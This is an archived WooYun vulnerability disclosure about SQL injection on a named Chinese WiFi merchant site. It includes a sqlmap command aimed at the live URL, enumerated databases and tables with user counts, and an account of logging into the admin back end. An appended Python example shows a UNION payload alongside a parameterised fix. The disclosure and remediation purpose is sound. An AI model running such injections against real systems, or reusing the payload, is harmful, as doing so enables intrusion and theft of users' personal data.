WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader --------------- http://drop.zone.ci/
Disclosure timeline:
2016-04-22: Details reported to the vendor, awaiting vendor handling
2016-04-22: Vendor confirmed; details disclosed to the vendor only
2016-05-02: Details disclosed to core white hats and experts in the relevant field
2016-05-12: Details disclosed to regular white hats
2016-05-22: Details disclosed to intern white hats
2016-06-06: Details disclosed to the public
As the title says: cross-database queries are possible.
Injection point:
    sqlmap.py -u "http://www.wswifi.cn/news_text.asp?newsid=3"
    http://ws.wswifi.cn/news_text.asp?newsid=25
Database information:
    back-end DBMS: Microsoft SQL Server 2008
    available databases [8]:
    [*] Engineering_database
    [*] master
    [*] model
    [*] msdb
    [*] tempdb
    [*] ws_weigou
    [*] wswifi
    [*] xhzA8_V10_2013
Table information:
Database: wswifi
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| dbo.user_Browse_record       | 261096  |
| dbo.free_renzheng            | 211319  |
| dbo.setggao_Browse_record    | 43750   |
| dbo.user_Browse_allcount     | 28472   |
| dbo.china                    | 3295    |
| dbo.user_login               | 2640    |
| dbo.Businesses_data          | 1451    |
| dbo.column_type              | 1416    |
| dbo.user_prozan              | 1345    |
| dbo.user_singin              | 1208    |
| dbo.Businesses_user          | 1180    |
| dbo.product                  | 849     |
| dbo.[user_renzheng_count---] | 450     |
| dbo.setggao_allcount         | 373     |
| dbo.businesses               | 360     |
| dbo.product_query            | 327     |
| dbo.propinglun               | 299     |
| dbo.Merchants                | 273     |
| dbo.Businessesuser_roll      | 260     |
| dbo.setggao_click_record     | 230     |
| dbo.pangolin_test_table      | 192     |
| dbo.job_Browse_record        | 190     |
| dbo.user_renzheng            | 96      |
| dbo.kehu_fahuo               | 87      |
| dbo.Businessesuser_active    | 83      |
| dbo.kehu_info                | 73      |
| dbo.user_renzheng_weixin     | 47      |
| dbo.rizhi_info               | 46      |
| dbo.agent_apply              | 33      |
| dbo.index_news               | 29      |
| dbo.Businesses_Transfer      | 28      |
| dbo.agent                    | 27      |
| dbo.setggao_fabu             | 20      |
| dbo.agent_salesman           | 18      |
| dbo.industry                 | 11      |
| dbo.Identification_type      | 10      |
| dbo.[setggao_order---]       | 9       |
| dbo.setggao                  | 7       |
| dbo.index_help               | 5       |
| dbo.column_display_mode      | 4       |
| dbo.agent_jibie              | 3       |
| dbo.agent_job                | 3       |
| dbo.wswifiadmin              | 3       |
| dbo.column_leixing           | 2       |
| dbo.job_Apply                | 2       |
| dbo.[ggao_send----]          | 1       |
| dbo.[ggao_type--]            | 1       |
| dbo.setggao_send             | 1       |
+------------------------------+---------+
After dumping the wswifiadmin table I logged into the back end: 360 merchants, all Internet cafés, KTVs and the like.
Cross-database queries work too; the other databases include order records and similar data.
Database: ws_weigou
+-------------------------------+---------+
| Table                         | Entries |
+-------------------------------+---------+
| dbo.user_order_awardnum       | 407332  |
| dbo.user_browsepro_record     | 269214  |
| dbo.user_liulan_record        | 111459  |
| dbo.user_Integral_detailed    | 4424    |
| dbo.user_login                | 3807    |
| dbo.china                     | 3295    |
| dbo.user_order                | 3074    |
| dbo.wg_user                   | 2421    |
| dbo.user_consumption_record   | 542     |
| dbo.[user_browsepro_record--] | 523     |
| dbo.user_recharge_record      | 507     |
| dbo.Product_shopping_trolley  | 429     |
| dbo.user_red_envelopes        | 357     |
| dbo.Product_award             | 59      |
| dbo.category                  | 30      |
| dbo.product                   | 25      |
| dbo.uploadapp_pro             | 24      |
| dbo.user_delivery_address     | 18      |
| dbo.user_award_public         | 15      |
| dbo.crowdfunding_pro          | 14      |
| dbo.crowdfunding_order_record | 10      |
| dbo.crowdfunding_order        | 8       |
| dbo.friend_pro                | 7       |
| dbo.user_grade                | 2       |
| dbo.crowdfunding_order_temp   | 1       |
| dbo.uploadadd                 | 1       |
| dbo.user_order_temp           | 1       |
| dbo.wsweigou_admin            | 1       |
+-------------------------------+---------+
Database: Engineering_database
+----------------------------------+----------+
| Table                            | Entries  |
+----------------------------------+----------+
| dbo.ggao_showcount_beifen        | 25196092 |
| dbo.ggao_showcount               | 3060837  |
| dbo.[ad_zhuomian_showcount--]    | 1648957  |
| dbo.netbar_user_count            | 561529   |
| dbo.ggao_clickcount              | 486537   |
| dbo.ggao_allcount                | 408032   |
| dbo.[ad_renzheng_lunbo_count--]  | 328725   |
| dbo.rand_six_password            | 200000   |
| dbo.netbar_user_allcount         | 67232    |
| dbo.[netbar_zhuomian_allcount--] | 63633    |
| dbo.netbar_user_login            | 47431    |
| dbo.netbar_user                  | 41135    |
| dbo.[ad_zhuomian_clickcount--]   | 33934    |
| dbo.user_recharge                | 8927     |
| dbo.netbar_login                 | 7432     |
| dbo.china                        | 3295     |
| dbo.ggao_fabu                    | 3008     |
| dbo.[netbar_lunbo_allcount--]    | 1539     |
| dbo.product                      | 396      |
| dbo.Product_query                | 312      |
| dbo.netbar                       | 281      |
| dbo.Package                      | 176      |
| dbo.ggao_send                    | 38       |
| dbo.netbar_admin                 | 29       |
| dbo.salesman                     | 21       |
| dbo.[ad_zhuomian--]              | 17       |
| dbo.[Engineering_user--]         | 9        |
| dbo.ggao_zizhu_allcount          | 9        |
| dbo.netbar_user_renzheng         | 8        |
| dbo.[ad_renzheng_lunbo--]        | 3        |
| dbo.Engineering_admin            | 3        |
| dbo.ggao_type                    | 3        |
| dbo.[ad_shezhi--]                | 1        |
+----------------------------------+----------+
dbo.netbar_user_count | 561529: roughly 560,000 user records.
Fix: filter the input.
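An added example of what "filter the input" amounts to for this injection point; it is not code from the WooYun report or from the vendor's site. It is a Python stand-in for the classic-ASP news page: the lookup built by string concatenation next to the same lookup with integer validation and a bound parameter, run against a constructed SQLite database. A second in-memory database is attached under the name wswifi so that the news query can reach wswifi.wswifiadmin, standing in for the way one MSSQL login with rights on several databases makes three-part names reachable from an injection elsewhere. The table names echo the report; the rows, the admin credential and the UNION payload are made up.

```python
import re
import sqlite3


# Constructed stand-in for the MSSQL back end behind news_text.asp.
# All rows, including the admin credential, are invented for this example.
def build_db() -> sqlite3.Connection:
    # autocommit mode: ATTACH is refused inside an open transaction
    con = sqlite3.connect(":memory:", isolation_level=None)
    con.execute("CREATE TABLE news (newsid INTEGER PRIMARY KEY, title TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(3, "Opening hours"), (25, "New package")])
    # A second database reachable through the same connection, like wswifi
    # (wswifi.dbo.wswifiadmin in MSSQL three-part naming) on the real server.
    con.execute("ATTACH DATABASE ':memory:' AS wswifi")
    con.execute("CREATE TABLE wswifi.wswifiadmin (username TEXT, password TEXT)")
    con.execute("INSERT INTO wswifi.wswifiadmin VALUES ('admin', 'example-hash')")
    return con


def news_text_vulnerable(con: sqlite3.Connection, newsid: str) -> list[str]:
    """The pattern behind the report: the query-string value is pasted
    straight into the SQL text, so a crafted newsid rewrites the query."""
    sql = f"SELECT title FROM news WHERE newsid = {newsid}"
    return [row[0] for row in con.execute(sql)]


def news_text_fixed(con: sqlite3.Connection, newsid: str) -> list[str]:
    """Two layers: reject anything that is not a plain integer (the filter
    the report asks for), then bind the value instead of splicing it in."""
    if not re.fullmatch(r"[0-9]{1,9}", newsid):
        raise ValueError("newsid must be a positive integer")
    sql = "SELECT title FROM news WHERE newsid = ?"
    return [row[0] for row in con.execute(sql, (int(newsid),))]


# A UNION payload of the kind sqlmap builds once it confirms the injection:
# it appends rows from the other database to the news page's own result.
PAYLOAD = "3 UNION SELECT username || ':' || password FROM wswifi.wswifiadmin"


if __name__ == "__main__":
    con = build_db()
    print("vulnerable, normal id:", news_text_vulnerable(con, "3"))
    print("vulnerable, payload:  ", news_text_vulnerable(con, PAYLOAD))
    print("fixed, normal id:     ", news_text_fixed(con, "3"))
    try:
        news_text_fixed(con, PAYLOAD)
    except ValueError as exc:
        print("fixed, payload:        rejected:", exc)
```

On the real page the bound parameter corresponds to an ADO Command object with a Parameter instead of a concatenated SQL string. The cross-database exposure is a separate problem and needs a separate fix: the web application's SQL login should have rights on its own database only, so that even a successful injection cannot read wswifiadmin or netbar_user_count from another database.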
Severity: High
Vulnerability Rank: 20
Confirmed: 2016-04-22 14:08
High-risk vulnerability
None yet